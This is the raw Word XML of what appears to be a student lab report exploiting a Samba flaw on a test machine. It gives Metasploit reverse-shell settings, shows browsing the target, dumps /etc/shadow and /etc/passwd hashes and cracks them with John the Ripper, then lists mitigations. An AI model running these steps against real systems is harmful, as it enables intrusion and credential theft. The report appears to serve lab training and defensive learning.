    <w:p w14:paraId="15376CC7" w14:textId="6FA5D890" w:rsidR="00B1672D" w:rsidRPr="00E748C5" w:rsidRDefault="00B1672D" w:rsidP="00E74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set LHOST 192.168.27.130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B4B8D6" w14:textId="54A2EB80" w:rsidR="00B1672D" w:rsidRPr="00E748C5" w:rsidRDefault="00B1672D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Configure payload for the exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF3DCA2" w14:textId="5585E3C8" w:rsidR="00B1672D" w:rsidRPr="00E748C5" w:rsidRDefault="00B1672D" w:rsidP="00E74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set PAYLOAD cmd/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unix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>/reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573219E9" w14:textId="24CB02D5" w:rsidR="00B1672D" w:rsidRPr="00E748C5" w:rsidRDefault="00B1672D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Configure port of host machine IP as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E701BCD" w14:textId="0E065197" w:rsidR="00B1672D" w:rsidRPr="00E748C5" w:rsidRDefault="00B1672D" w:rsidP="00E74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set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CC62B1" w14:textId="1CE032B5" w:rsidR="0054637D" w:rsidRPr="00E748C5" w:rsidRDefault="0054637D" w:rsidP="00E748C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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597313D2" wp14:editId="4FE7C6E7">
            <wp:extent cx="5261610" cy="3074035"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="169182042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2042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271" cy="307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33EA" w14:textId="7F8A542E" w:rsidR="00B1672D" w:rsidRPr="00E748C5" w:rsidRDefault="00B1672D" w:rsidP="00E748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All settings upon being set can then be used to perform exploit by using the either of the two commands “run” or “exploit”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F31AD7" w14:textId="77777777" w:rsidR="00AF60F5" w:rsidRPr="00E748C5" w:rsidRDefault="00AF60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108CA126" w14:textId="77777777" w:rsidR="00AF60F5" w:rsidRPr="00E748C5" w:rsidRDefault="00AF60F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EAADEA6" w14:textId="77777777" w:rsidR="00E748C5" w:rsidRPr="00E748C5" w:rsidRDefault="00E748C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4182F24" w14:textId="3C25C894" w:rsidR="00B1672D" w:rsidRPr="00E748C5" w:rsidRDefault="001B216E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lastRenderedPageBreak/>
        <w:t>RESULT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A1DFD6" w14:textId="40866085" w:rsidR="0054637D" w:rsidRPr="0054637D" w:rsidRDefault="0054637D" w:rsidP="00E748C5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5261FFDF" wp14:editId="64A367BC">
            <wp:extent cx="5731510" cy="1347788"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="3872016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171"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="134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86841" w14:textId="125DF4B8" w:rsidR="0054637D" w:rsidRPr="00E748C5" w:rsidRDefault="0054637D" w:rsidP="00E748C5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34C4539C" wp14:editId="2A95C4EC">
            <wp:extent cx="5731510" cy="3509645"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="106184747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4747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34"/>
                    <a:stretch/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AA35D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53620090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63D22BBC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33A7C773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510D281F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3E0DA07E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53962F4A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164BDD06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5CAB2000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1E9C2FAA" w14:textId="77777777" w:rsidR="00E748C5" w:rsidRPr="00E748C5" w:rsidRDefault="00E748C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52C19F7B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278B65DF" w14:textId="77777777" w:rsidR="007D12F5" w:rsidRPr="00E748C5" w:rsidRDefault="007D12F5" w:rsidP="00E748C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4F40425C" w14:textId="69100B39" w:rsidR="00E555A4" w:rsidRPr="00E748C5" w:rsidRDefault="00AF60F5" w:rsidP="00E748C5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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DEMONSTRATION OF ACCESS TO TARGET MACHINE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D7FDE7" w14:textId="5E4D601C" w:rsidR="000E49D0" w:rsidRPr="00E748C5" w:rsidRDefault="00E555A4" w:rsidP="00E748C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Accessing /etc directory and seeing potentially important files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C0168B" w14:textId="1054D2F2" w:rsidR="000E49D0" w:rsidRPr="00E748C5" w:rsidRDefault="000E49D0" w:rsidP="00E748C5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E748C5">
        <w:t>Showcase of file permissions on Target Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE73C72" w14:textId="6208CFD6" w:rsidR="000E49D0" w:rsidRPr="00E748C5" w:rsidRDefault="007D12F5" w:rsidP="00E748C5">
      <w:pPr>
        <w:ind w:left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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="319F4676" wp14:editId="03BC304E">
            <wp:extent cx="5503230" cy="7446010"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="38426911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6911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887" cy="745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9D0" w:rsidRPr="00E748C5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33114A2D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6DF4A967" w14:textId="70421AF6" w:rsidR="007D12F5" w:rsidRPr="00E748C5" w:rsidRDefault="000E49D0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lastRenderedPageBreak/>
        <w:t xml:space="preserve">b. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hosts directory and 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resolv.conf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file contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455587F2" w14:textId="7D4D1FFC" w:rsidR="000E49D0" w:rsidRPr="007D12F5" w:rsidRDefault="007D12F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0C71D87E" wp14:editId="536CC988">
            <wp:extent cx="5256397" cy="2276475"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="1368350528" name="Picture 2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0528" name="Picture 2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139" cy="22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BA01" w14:textId="48917773" w:rsidR="000E49D0" w:rsidRPr="00E748C5" w:rsidRDefault="00E555A4" w:rsidP="00E748C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Creating a text file on desktop:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A013C9" w14:textId="52BF88B0" w:rsidR="000E49D0" w:rsidRPr="00E748C5" w:rsidRDefault="000E49D0" w:rsidP="00E748C5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E748C5">
        <w:t>Checking current directory contents on host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4AF41B" w14:textId="6583A91E" w:rsidR="000E49D0" w:rsidRPr="00E748C5" w:rsidRDefault="007D12F5" w:rsidP="00E748C5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3456ED36" wp14:editId="18C8E748">
            <wp:extent cx="1609090" cy="5267828"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1281467022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7022" name="Picture 2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526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C55E" w14:textId="6102467E" w:rsidR="000E49D0" w:rsidRPr="00E748C5" w:rsidRDefault="000E49D0" w:rsidP="00E748C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lastRenderedPageBreak/>
        <w:t>Checking on target machine contents of Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A5F300" w14:textId="317995EF" w:rsidR="000E49D0" w:rsidRPr="00E748C5" w:rsidRDefault="007D12F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86672E6" wp14:editId="6DAE6EFD">
            <wp:extent cx="3009900" cy="314325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="20968307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A67C" w14:textId="1F8A65C0" w:rsidR="000E49D0" w:rsidRPr="00E748C5" w:rsidRDefault="000E49D0" w:rsidP="00E748C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Creating a folder on host machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB26257" w14:textId="13F2F2B7" w:rsidR="007D12F5" w:rsidRPr="00E748C5" w:rsidRDefault="007D12F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E6BE810" wp14:editId="68D04166">
            <wp:extent cx="942975" cy="1295400"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1822180223" name="Picture 3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0223" name="Picture 31" descr="A close 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AD00" w14:textId="2E3D1277" w:rsidR="000E49D0" w:rsidRPr="00E748C5" w:rsidRDefault="000E49D0" w:rsidP="00E748C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Checking creation of directory on target machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E6D29F" w14:textId="4A2B174C" w:rsidR="000E49D0" w:rsidRPr="00E748C5" w:rsidRDefault="000E49D0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72298A0F" wp14:editId="3EA25E48">
            <wp:extent cx="2847975" cy="485775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="571484921" name="Picture 2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4921" name="Picture 2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82B9" w14:textId="6CAFF802" w:rsidR="000E49D0" w:rsidRPr="00E748C5" w:rsidRDefault="000E49D0" w:rsidP="00E748C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Creating a text file on Desktop using Host machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B42FBAF" w14:textId="60C88AF0" w:rsidR="007D12F5" w:rsidRPr="00E748C5" w:rsidRDefault="007D12F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7F73DF1B" wp14:editId="1BDEC3D8">
            <wp:extent cx="2571750" cy="1114425"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2035239391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39391" name="Picture 3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DFC9" w14:textId="42567B87" w:rsidR="000E49D0" w:rsidRPr="00E748C5" w:rsidRDefault="000E49D0" w:rsidP="00E748C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Checking creation of text file on target machine and contents of file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C642BFB" w14:textId="1795CBF1" w:rsidR="007D12F5" w:rsidRDefault="007D12F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2EB7632B" wp14:editId="6CE84D3C">
            <wp:extent cx="4457700" cy="962025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="776525534" name="Picture 3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25534" name="Picture 3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E83F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59C9C087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1294A54B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6FC20AB9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775F47D3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231C8A4E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2B6329F8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42BAAF5B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28B5367B" w14:textId="77777777" w:rsidR="00E748C5" w:rsidRPr="007D12F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285358F7" w14:textId="16005C5E" w:rsidR="007D12F5" w:rsidRPr="00E748C5" w:rsidRDefault="007D12F5" w:rsidP="00E748C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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Dumping Password Hashes from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/etc/shadow</w:t>
      </w:r>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and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/etc/passwd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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFA3361" w14:textId="5934586F" w:rsidR="000E49D0" w:rsidRPr="00E748C5" w:rsidRDefault="000E49D0" w:rsidP="00E748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Checking potential passwords for cracking on target machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C50571" w14:textId="7B3768AD" w:rsidR="000E49D0" w:rsidRPr="00E748C5" w:rsidRDefault="000E49D0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7B7AE16" wp14:editId="12D94C7F">
            <wp:extent cx="5264407" cy="5838825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="176512914" name="Picture 2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92722" name="Picture 2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76" cy="58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785D" w14:textId="509D4620" w:rsidR="000E49D0" w:rsidRDefault="000E49D0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3C9823C3" wp14:editId="1615F54A">
            <wp:extent cx="5264407" cy="5530850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1997862108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784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136" cy="55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A1EF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674286ED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554955E2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6FFE6357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6A70E676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09FAC935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7356333C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73DCB0B6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280468BE" w14:textId="77777777" w:rsid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5F276721" w14:textId="77777777" w:rsidR="00E748C5" w:rsidRPr="00E748C5" w:rsidRDefault="00E748C5" w:rsidP="00E748C5">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D3695F0" w14:textId="11492A69" w:rsidR="000E49D0" w:rsidRPr="00E748C5" w:rsidRDefault="000E49D0" w:rsidP="00E748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lastRenderedPageBreak/>
        <w:t>Creating a text file named “hash.txt” on attacking mac</w:t>
      </w:r>
      <w:r w:rsidR="005B3267" w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hine and saving contents of both files on it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26551EB7" w14:textId="281B4731" w:rsidR="005B3267" w:rsidRPr="00E748C5" w:rsidRDefault="005B3267" w:rsidP="00E74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2E19AFA6" wp14:editId="1CA8A13A">
            <wp:extent cx="4809850" cy="4623435"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="13356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28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7660" cy="46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BF6C" w14:textId="5517901F" w:rsidR="005B3267" w:rsidRPr="00E748C5" w:rsidRDefault="005B3267" w:rsidP="00E748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Using ‘John the ripper’, cracking the passwords saved on hash.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0648FA" w14:textId="062D99B4" w:rsidR="007D12F5" w:rsidRPr="00E748C5" w:rsidRDefault="000E49D0" w:rsidP="00E748C5">
      <w:pPr>
        <w:ind w:left="1080" w:firstLine="360"/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1E6E5473" wp14:editId="05166D48">
            <wp:extent cx="4809490" cy="1854200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21189197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19706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395" cy="186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1F0E" w14:textId="63D74928" w:rsidR="005B3267" w:rsidRPr="00E748C5" w:rsidRDefault="005B3267" w:rsidP="00E748C5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From above image we can note that the main users on target machine </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>are:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> user, test, service, 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postgres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&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> along-with two more external candidate users and their passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE90563" w14:textId="77777777" w:rsidR="00E748C5" w:rsidRPr="00E748C5" w:rsidRDefault="00E748C5" w:rsidP="00E748C5">
      <w:p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Accessing /etc/passwd and /etc/shadow proves:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69807A0F" w14:textId="77777777" w:rsidR="00E748C5" w:rsidRPr="00E748C5" w:rsidRDefault="00E748C5" w:rsidP="00E748C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You have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root-level access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D77C27" w14:textId="77777777" w:rsidR="00E748C5" w:rsidRPr="00E748C5" w:rsidRDefault="00E748C5" w:rsidP="00E748C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The system is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completely compromised</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F391FB" w14:textId="4DC7E863" w:rsidR="00E748C5" w:rsidRPr="00E748C5" w:rsidRDefault="00E748C5" w:rsidP="00E748C5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sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You can extract </w:t>
      </w:r>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hashes for offline password cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BD5187" w14:textId="57149C30" w:rsidR="00E748C5" w:rsidRPr="00E748C5" w:rsidRDefault="00E748C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lastRenderedPageBreak/>
        <w:t>IMPACT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0F5B41" w14:textId="3BF4D0D6" w:rsidR="00E748C5" w:rsidRPr="00E748C5" w:rsidRDefault="00E748C5" w:rsidP="00E748C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Remote code execution as root without authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2577334E" w14:textId="2024915B" w:rsidR="00E748C5" w:rsidRPr="00E748C5" w:rsidRDefault="00E748C5" w:rsidP="00E748C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Attacker can install backdoors, exfiltrate files and escalate in network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4464BBB7" w14:textId="77777777" w:rsidR="00E748C5" w:rsidRPr="00E748C5" w:rsidRDefault="00E748C5" w:rsidP="00E748C5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483F04AC" w14:textId="4E0DC7D3" w:rsidR="00E748C5" w:rsidRPr="00E748C5" w:rsidRDefault="00E748C5" w:rsidP="00E748C5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748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">MITIGATIONS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074E4629" w14:textId="5AE57F03" w:rsidR="00E748C5" w:rsidRPr="00E748C5" w:rsidRDefault="00E748C5" w:rsidP="00E748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Disable or remove Samba if not needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E65030" w14:textId="3C72C935" w:rsidR="00E748C5" w:rsidRPr="00E748C5" w:rsidRDefault="00E748C5" w:rsidP="00E748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Patch to a newer Samba version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0A9846" w14:textId="4880314A" w:rsidR="00E748C5" w:rsidRPr="00E748C5" w:rsidRDefault="00E748C5" w:rsidP="00E748C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2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E748C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Restrict ports 139/445 using firewall rules</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E748C5" w:rsidRPr="00E748C5" w:rsidSect="00E748C5">
      <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440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579"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="70EC7600"/>
    <w:lvl w:ilvl="0" w:tplc="EF5E6F7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E3FD2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0D723BF2"/>
    <w:lvl w:ilvl="0" w:tplc="23E466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9E423F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="83BC58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409CF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D9C4C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C768B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="222AE93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850CA3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DC683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74409"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BC0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4192E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4C443C4A"/>
    <w:lvl w:ilvl="0" w:tplc="992837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D640B69"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="84AAD738"/>
    <w:lvl w:ilvl="0" w:tplc="72AED7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E351F8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1A4E7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01463"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1E8A02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351295">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1760103481">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="363139716">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="195045256">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="784037308">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="205608912">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="372849208">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="712652879">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="2109538849">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1973361625">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="971132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33"/>
    <w:rsid w:val="000E49D0"/>
    <w:rsid w:val="001759BD"/>
    <w:rsid w:val="001B216E"/>
    <w:rsid w:val="0046174D"/>
    <w:rsid w:val="0054637D"/>
    <w:rsid w:val="00555E8A"/>
    <w:rsid w:val="005875FE"/>
    <w:rsid w:val="005B3267"/>
    <w:rsid w:val="005C04DF"/>
    <w:rsid w:val="005F7D8C"/>
    <w:rsid w:val="0060703D"/>
    <w:rsid w:val="00723CDF"/>
    <w:rsid w:val="007C0695"/>
    <w:rsid w:val="007D12F5"/>
    <w:rsid w:val="008B0CCF"/>
    <w:rsid w:val="00AF60F5"/>
    <w:rsid w:val="00B1672D"/>
    <w:rsid w:val="00CD5233"/>
    <w:rsid w:val="00D75DD8"/>
    <w:rsid w:val="00DF594F"/>
    <w:rsid w:val="00E555A4"/>
    <w:rsid w:val="00E7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D3BE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A06942D9-DDC7-4A78-B04F-5947CC52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2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33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5233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233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2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52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52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2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3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D5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7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0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03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07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nvd.nist.gov/vuln/detail/cve-2015-0240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C97AF-8846-4890-AF59-2B0CCF7A6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Atkare</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Arnav Atkare</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <cp:lastPrinted>2025-06-20T15:01:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-06-20T11:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-20T15:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>